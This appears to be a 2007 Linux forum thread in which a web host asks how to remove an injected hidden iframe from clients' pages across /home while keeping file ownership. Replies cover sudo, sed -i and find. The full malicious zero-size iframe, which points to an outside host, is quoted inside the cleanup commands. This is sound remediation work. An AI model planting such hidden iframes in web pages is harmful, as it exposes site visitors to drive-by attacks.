LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Software
User Name
Password
Linux - Software This forum is for Software issues.
Having a problem installing a new program? Want to know which application is best for the job? Post your question in this forum.

Notices


Reply
  Search this Thread
Old 10-10-2007, 07:26 PM   #1
hostpc
LQ Newbie
 
Registered: Oct 2007
Posts: 4

Rep: Reputation: 0
bash or perl replace .. maybe sed


Here's a situation I need some help with. Hopefully the brainy people here can shed some light.

I have a web server with several dozen clients. Each client has web space defined as:

/home/USERNAME/domains/ANYDOMAIN.COM/public_html

under each username, they can have multiple domains - so USERNAME can have DOMAIN1.com DOMAIN2.com DOMAIN3.com - etc.

in each of those public_html folders, there's index pages, website contents, etc.

I need to search ALL html and php pages for specific content - in this case, it's an iframe exploit (thank you very much Joomla) that potentially affected multiple USERNAMES

I started with

Code:
sed 's/<html><iframe width=0 height=0 frameborder=0 src=http:\/\/www[.]o00o[.]info\/portal\/index[.]php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no><\/iframe><\/html>/\&nbsp;/g' index.html > TMPFILE && mv TMPFILE index.html;
The iframe code is consistent through any page.

which sorta works fine, for one user at a time, however - it leaves the resulting index.html file as owned by root (script owned/run by root).

What I need to accomplish is to remove that iframe content from any page (index.html or index.php) page on the server - in any USERNAME - and leave the resulting file owned by the original user.

The part I need help with is the "for i" scripting around it - and understanding that the USERNAME needs to be changed for each directory it's in.

It needs to search the entire /home structure. I realize it'll take time - I'm ok with that... but if you have a better way, I'm all ears.


Thanks for any help you can offer!


Joe
 
Old 10-10-2007, 08:59 PM   #2
jschiwal
LQ Guru
 
Registered: Aug 2001
Location: Fargo, ND
Distribution: SuSE AMD64
Posts: 15,733

Rep: Reputation: 682Reputation: 682Reputation: 682Reputation: 682Reputation: 682Reputation: 682
You could use sudo and the sed option "-i" to edit the file inplace. The problem is that the redirection is interpreted as a redirection for the "sudo" command and not the command being executed. Look at the sudo manpage:
Quote:
To make a usage listing of the directories in the /home partition.
Note that this runs the commands in a sub-shell to make the cd and file
redirection work.

$ sudo sh -c "cd /home ; du -s * │ sort -rn > USAGE"
Code:
hpamd64:/home/jschiwal # sudo -u jschiwal sh -c "sed 's/<iframe>.*<\/iframe>//g' test >result"
hpamd64:/home/jschiwal # ls -l result
 
Old 10-10-2007, 09:37 PM   #3
hostpc
LQ Newbie
 
Registered: Oct 2007
Posts: 4

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by jschiwal View Post
You could use sudo and the sed option "-i" to edit the file inplace. The problem is that the redirection is interpreted as a redirection for the "sudo" command and not the command being executed. Look at the sudo manpage:


Code:
hpamd64:/home/jschiwal # sudo -u jschiwal sh -c "sed 's/<iframe>.*<\/iframe>//g' test >result"
hpamd64:/home/jschiwal # ls -l result

I went through all that work escaping the /'s ... and your trick would have done it? Dang!

Any feedback on how the user can be dynamically changed based on the directory it's in?
 
Old 10-11-2007, 12:05 PM   #4
osor
HCL Maintainer
 
Registered: Jan 2006
Distribution: (H)LFS, Gentoo
Posts: 2,450

Rep: Reputation: 78
Quote:
Originally Posted by hostpc View Post
I went through all that work escaping the /'s ... and your trick would have done it? Dang!
Just an FYI, if you have a lot of “/” characters, you don’t have to use “/” as a delimiter in a sed substitution. For example, your original match might have been more readable with something like the pipe character (“|”) as the delimiter:
Code:
sed -e 's|<html><iframe width=0 height=0 frameborder=0 src=http://www[.]o00o[.]info/portal/index[.]php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>|\&nbsp;|g' index.html > TMPFILE && mv TMPFILE index.html;
Quote:
Originally Posted by hostpc View Post
Any feedback on how the user can be dynamically changed based on the directory it's in?
Something like
Code:
sudo -u $(basename $PWD) …
 
Old 10-11-2007, 04:21 PM   #5
matthewg42
Senior Member
 
Registered: Oct 2003
Location: UK
Distribution: Kubuntu 12.10 (using awesome wm though)
Posts: 3,530

Rep: Reputation: 65
Sed can modify files "in-place" by using the -i option (the existing file is modified rather than having to create a new file using re-direction and then moving it). This doesn't affect the owner of the file, so it might serve you better than using re-direction and mv.

This is clearly a risky operation - you must be sure that you have the correct command else you could cause a lot of trouble. You can add something after the -i and in this case a backup file will be created with this suffix, e.g.
Code:
$ ls data*
data
$ sed -i.backup 's/old/new/g' data
$ ls data*
data     data.backup
But again, be a little careful as existing files with the filename and the backup suffix will be overwritten.

Using find to locate files and piping that into "xargs sed -i.backup ..." should do the trick.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
sed replace string octeto Programming 4 06-06-2007 02:09 AM
SED - replace / insert furquan Programming 5 03-01-2006 06:58 PM
How can I replace this string with another using sed? dave4545 Programming 7 01-27-2006 10:58 AM
[sed] replace string? chuanyung Programming 3 03-11-2004 08:42 PM
problem in perl replace command with slash (/) in search/replace string ramesh_ps1 Red Hat 4 09-10-2003 01:04 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Software

All times are GMT -5. The time now is 08:17 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration